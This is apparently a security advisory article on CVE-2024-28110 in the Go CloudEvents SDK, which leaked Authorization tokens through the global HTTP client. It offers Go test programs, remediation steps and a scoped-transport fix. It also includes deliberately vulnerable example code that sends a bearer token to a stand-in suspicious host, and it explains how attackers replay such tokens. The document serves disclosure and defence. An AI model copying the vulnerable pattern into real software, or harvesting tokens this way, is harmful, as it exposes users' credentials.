If you're using CloudEvents in your Go apps, pay close attention—there’s a new vulnerability you must know about. CVE-2024-28110 is a serious bug in the Go CloudEvents SDK (github.com/cloudevents/sdk-go) that could put your HTTP credentials at risk. In this article, I’ll break down what went wrong, how the exploit works, show some code, and tell you exactly how to keep your projects safe.

What is CloudEvents?

CloudEvents is a specification for describing event data in a common way. The Go SDK is the official tool for integrating Go applications with CloudEvents. It's used everywhere—from cloud-native apps to serverless functions.

What is CVE-2024-28110?

CVE-2024-28110 affects the Go SDK for CloudEvents (github.com/cloudevents/sdk-go/v2) in versions before v2.15.2. The vulnerability lets sensitive credentials (for example Authorization tokens carried by a custom transport) leak to arbitrary HTTP endpoints that have nothing to do with CloudEvents.

How?
When you use cloudevents.WithRoundTripper to create an authenticated CloudEvents client and do not hand the SDK an http.Client of your own, the SDK falls back to the global http.DefaultClient and sets its Transport to your round tripper. It modifies the process-wide default, not a private client. From that point on, any HTTP request your app (or a library you use!) makes through http.DefaultClient, including the package-level http.Get and http.Post helpers, sends your Authorization header to hosts it was never meant for.

Fixed in: v2.15.2
Original Advisory:
GitHub Security Advisory GHSA-v776-q48j-99jh
NVD Entry CVE-2024-28110

What happens, step by step:

1. You build an http.RoundTripper that adds your credentials (for example an Authorization header) to every request it sends.
2. You pass it to the SDK with WithRoundTripper, without also supplying your own http.Client.
3. Because no client was supplied, the SDK internally falls back to http.DefaultClient and sets that client's Transport to your authenticated round tripper.
4. Now, anywhere in your app (or in libraries) that uses http.DefaultClient, including the package-level http.Get and http.Post, unknowingly goes through your custom transport and sends your credentials to any endpoint it connects to, not just your CloudEvents endpoint!
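The following Go program is an added illustration, not code from the SDK or from the original advisory. It models the two constructors side by side: newVulnerable reproduces the pre-2.15.2 fallback to http.DefaultClient followed by the Transport assignment, and newFixed the patched behaviour of using a private client. The protocol type, the constructor names and the bearer token are simplifications assumed for the example; the check uses a local httptest server standing in for an unrelated endpoint and reports which Authorization header it received from a plain http.DefaultClient call, which is exactly the test you want in your own suite.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

// bearerTransport attaches a bearer token to every request it sends.
type bearerTransport struct {
	token string
	inner http.RoundTripper
}

func (t *bearerTransport) RoundTrip(req *http.Request) (*http.Response, error) {
	// Clone first: a RoundTripper must not mutate the caller's request.
	r := req.Clone(req.Context())
	r.Header.Set("Authorization", "Bearer "+t.token)
	return t.inner.RoundTrip(r)
}

// protocol is a simplified stand-in for the SDK's HTTP protocol (assumption
// for this example): the only field that matters here is the client it uses.
type protocol struct {
	client *http.Client
}

// newVulnerable models the pre-2.15.2 constructor: with no client supplied it
// falls back to http.DefaultClient and then installs the round tripper on it,
// which mutates the process-wide default client.
func newVulnerable(rt http.RoundTripper) *protocol {
	p := &protocol{}
	if p.client == nil {
		p.client = http.DefaultClient
	}
	if rt != nil {
		p.client.Transport = rt
	}
	return p
}

// newFixed models the 2.15.2 behaviour: the SDK gets a fresh, private client,
// so the round tripper never reaches http.DefaultClient.
func newFixed(rt http.RoundTripper) *protocol {
	p := &protocol{client: &http.Client{}}
	if rt != nil {
		p.client.Transport = rt
	}
	return p
}

// authHeaderSeen starts a throwaway local server standing in for an unrelated
// endpoint, sends one GET through c, and returns the Authorization header the
// server received ("" when none was sent).
func authHeaderSeen(c *http.Client) (string, error) {
	var seen string
	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		seen = r.Header.Get("Authorization")
	}))
	defer srv.Close()
	resp, err := c.Get(srv.URL)
	if err != nil {
		return "", err
	}
	resp.Body.Close()
	return seen, nil
}

// leakCheck constructs the protocol with ctor and reports the Authorization
// header carried by an unrelated http.DefaultClient call and by the SDK's own
// client. It restores http.DefaultClient.Transport afterwards so the check
// does not itself poison later code.
func leakCheck(ctor func(http.RoundTripper) *protocol, token string) (defaultClientHeader, sdkClientHeader string, err error) {
	saved := http.DefaultClient.Transport
	defer func() { http.DefaultClient.Transport = saved }()

	p := ctor(&bearerTransport{token: token, inner: http.DefaultTransport})
	if defaultClientHeader, err = authHeaderSeen(http.DefaultClient); err != nil {
		return
	}
	sdkClientHeader, err = authHeaderSeen(p.client)
	return
}

func main() {
	for name, ctor := range map[string]func(http.RoundTripper) *protocol{
		"vulnerable (<2.15.2)": newVulnerable,
		"fixed (2.15.2)":       newFixed,
	} {
		def, sdk, err := leakCheck(ctor, "SECRET-TOKEN")
		if err != nil {
			panic(err)
		}
		fmt.Printf("%-22s DefaultClient sent %q, SDK client sent %q\n", name, def, sdk)
	}
}
```

With the vulnerable constructor both calls carry "Bearer SECRET-TOKEN"; with the fixed one only the SDK's private client does, and the unrelated call carries nothing. The same authHeaderSeen check, pointed at http.DefaultClient after you have constructed your real CloudEvents client, is a cheap regression test for this class of bug.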

Example Vulnerable Code

package main

import (
	"log"
	"net/http"

	"github.com/cloudevents/sdk-go/v2/client"
	cloudeventshttp "github.com/cloudevents/sdk-go/v2/protocol/http"
)

// AuthTransport wraps the default transport with a bearer token.
func AuthTransport(token string) http.RoundTripper {
	return &transportWithAuth{
		token: token,
		inner: http.DefaultTransport,
	}
}

// transportWithAuth adds the Authorization header to every request
// that passes through it, whatever host the request is going to.
type transportWithAuth struct {
	token string
	inner http.RoundTripper
}

func (t *transportWithAuth) RoundTrip(req *http.Request) (*http.Response, error) {
	req.Header.Set("Authorization", "Bearer "+t.token)
	return t.inner.RoundTrip(req)
}

func main() {
	// BAD (sdk-go < v2.15.2): with no client supplied, the SDK installs this
	// transport on the global http.DefaultClient!
	p, err := cloudeventshttp.New(
		cloudeventshttp.WithRoundTripper(AuthTransport("SECRET-TOKEN")),
	)
	if err != nil {
		log.Fatal(err)
	}
	c, err := client.New(p)
	if err != nil {
		log.Fatal(err)
	}
	_ = c // send events with c as usual

	// Any other HTTP request made through http.DefaultClient now carries
	// the secret token, including this one to an unrelated host.
	resp, err := http.Get("https://api.suspicious.example.com") // <--- leaks Authorization header!
	if err != nil {
		log.Fatal(err)
	}
	resp.Body.Close()
}

The Exploit Explained

Attackers don't need access to your CloudEvents traffic at all. They only need to get your code, or any dependency it pulls in, to make a request through http.DefaultClient to a host they control or can observe (say, to download an image, check for an update, call a URL taken from user input, or follow a redirect). The Authorization token rides along on that request, and the attacker can replay it against your CloudEvents endpoint or any other service that accepts it. One caveat worth knowing: Go's http.Client normally drops the Authorization header when it follows a redirect to a different domain, but that protection does not help here, because the header is added inside the transport's RoundTrip, which runs again for every redirected hop.

Who’s affected?

Any Go application that depends on github.com/cloudevents/sdk-go/v2 before v2.15.2 and builds its HTTP protocol with WithRoundTripper (or the cloudevents.WithRoundTripper alias) without supplying its own http.Client. The exposure is not limited to the CloudEvents code path: once the global client has been modified, every http.Get, http.Post or http.DefaultClient.Do call in the process, including calls made by third-party libraries, sends the credentials. If you pass your own client through the protocol's WithClient option, the round tripper is installed on that client rather than on the global one.

Remediation

Upgrade Immediately:
Update your github.com/cloudevents/sdk-go/v2 dependency to at least v2.15.2.

go get github.com/cloudevents/sdk-go/v2@v2.15.2
go mod tidy

Check your code for this pattern:
If you use WithRoundTripper, find every other place your process makes HTTP calls through the default client and verify, with a unit test or a local proxy, that those calls do not carry your Authorization header.

How Was It Patched?

Starting in v2.15.2, the SDK carefully ensures that its own protocol client uses the custom transport without mutating http.DefaultClient—meaning other parts of your app remain safe.

Patched code reference:
github.com/cloudevents/sdk-go/commit/09f1eaa...

Simple Mitigation Tips

- Never trust third-party libraries to “do the right thing” with shared Go globals like http.DefaultClient (or http.DefaultTransport); give each library its own client.
- If you need custom HTTP authentication, hand the SDK an isolated http.Client of your own (the protocol's WithClient option) rather than only a RoundTripper, so the transport can never end up on the global client.
- Search your code for WithRoundTripper.
- Review all HTTP requests, especially those that go through the default client after the CloudEvents transport has been configured.
- Use network inspection tools (a local intercepting proxy, or an httptest server in a unit test) to spot unwanted Authorization headers on HTTP calls to other hosts.
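As an added, stand-alone example (not the SDK's code or the article author's), here is the isolated-client pattern with one more layer of defence: the authenticating transport itself only attaches the token to HTTPS requests for the host it belongs to, so even a transport that did end up on a shared client could not hand the token to anyone else. The host name events.example.com, the token, and the recorder standing in for the network are assumptions for illustration; the resulting http.Client is what you would give to the SDK's WithClient option instead of using WithRoundTripper alone.

```go
package main

import (
	"errors"
	"fmt"
	"io"
	"net/http"
	"strings"
)

// scopedBearerTransport attaches a bearer token only to HTTPS requests bound
// for allowedHost. Requests to any other host are forwarded without it, so the
// token cannot leak even if this transport ends up on a shared client.
type scopedBearerTransport struct {
	token       string
	allowedHost string // "host" or "host:port", exactly as it appears in the URL
	inner       http.RoundTripper
}

var errPlaintext = errors.New("refusing to send bearer token over plaintext http")

func (t *scopedBearerTransport) RoundTrip(req *http.Request) (*http.Response, error) {
	if !strings.EqualFold(req.URL.Host, t.allowedHost) {
		// Out of scope: pass through untouched, no credential attached.
		return t.inner.RoundTrip(req)
	}
	if req.URL.Scheme != "https" {
		return nil, errPlaintext
	}
	r := req.Clone(req.Context()) // a RoundTripper must not mutate the caller's request
	r.Header.Set("Authorization", "Bearer "+t.token)
	return t.inner.RoundTrip(r)
}

// newEventsClient builds the dedicated client to hand to the SDK (assumed
// helper name). It never touches http.DefaultClient; inner defaults to
// http.DefaultTransport when nil.
func newEventsClient(token, eventsHost string, inner http.RoundTripper) *http.Client {
	if inner == nil {
		inner = http.DefaultTransport
	}
	return &http.Client{Transport: &scopedBearerTransport{
		token:       token,
		allowedHost: eventsHost,
		inner:       inner,
	}}
}

// recorder is a fake inner RoundTripper for offline testing: it records the
// Authorization header it was asked to send and answers 204 without touching
// the network.
type recorder struct{ lastAuth string }

func (r *recorder) RoundTrip(req *http.Request) (*http.Response, error) {
	r.lastAuth = req.Header.Get("Authorization")
	return &http.Response{
		StatusCode: http.StatusNoContent,
		Header:     make(http.Header),
		Body:       io.NopCloser(strings.NewReader("")),
		Request:    req,
	}, nil
}

// authSentTo reports the Authorization header a GET to url carries through
// client c, with rec acting as the wire.
func authSentTo(c *http.Client, rec *recorder, url string) (string, error) {
	resp, err := c.Get(url)
	if err != nil {
		return "", err
	}
	resp.Body.Close()
	return rec.lastAuth, nil
}

func main() {
	rec := &recorder{}
	c := newEventsClient("SECRET-TOKEN", "events.example.com", rec)
	for _, u := range []string{
		"https://events.example.com/v1/events",      // in scope: token attached
		"https://api.suspicious.example.com/update", // other host: no token
		"http://events.example.com/v1/events",       // plaintext: refused
	} {
		h, err := authSentTo(c, rec, u)
		fmt.Printf("%-45s Authorization=%q err=%v\n", u, h, err)
	}
}
```

The client returned by newEventsClient is the one object the SDK should ever see; http.DefaultClient stays untouched, and the scoped transport means a future library that does grab the global client still cannot forward the token to a host the token was not issued for.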

Summary

CVE-2024-28110 is a real-world example of why mutating global state is risky—especially in popular frameworks. A simple option to add authentication exposed credentials to any endpoint your Go app touched via the default HTTP client.

References

- GitHub Security Advisory GHSA-v776-q48j-99jh
- NVD CVE-2024-28110
- Upstream fix commit
- CloudEvents Go SDK on GitHub


Stay safe out there and keep your tokens secret! If you have questions about Go security, drop them below.

Timeline

Published on: 03/06/2024 22:15:57 UTC
Last modified on: 03/07/2024 13:52:27 UTC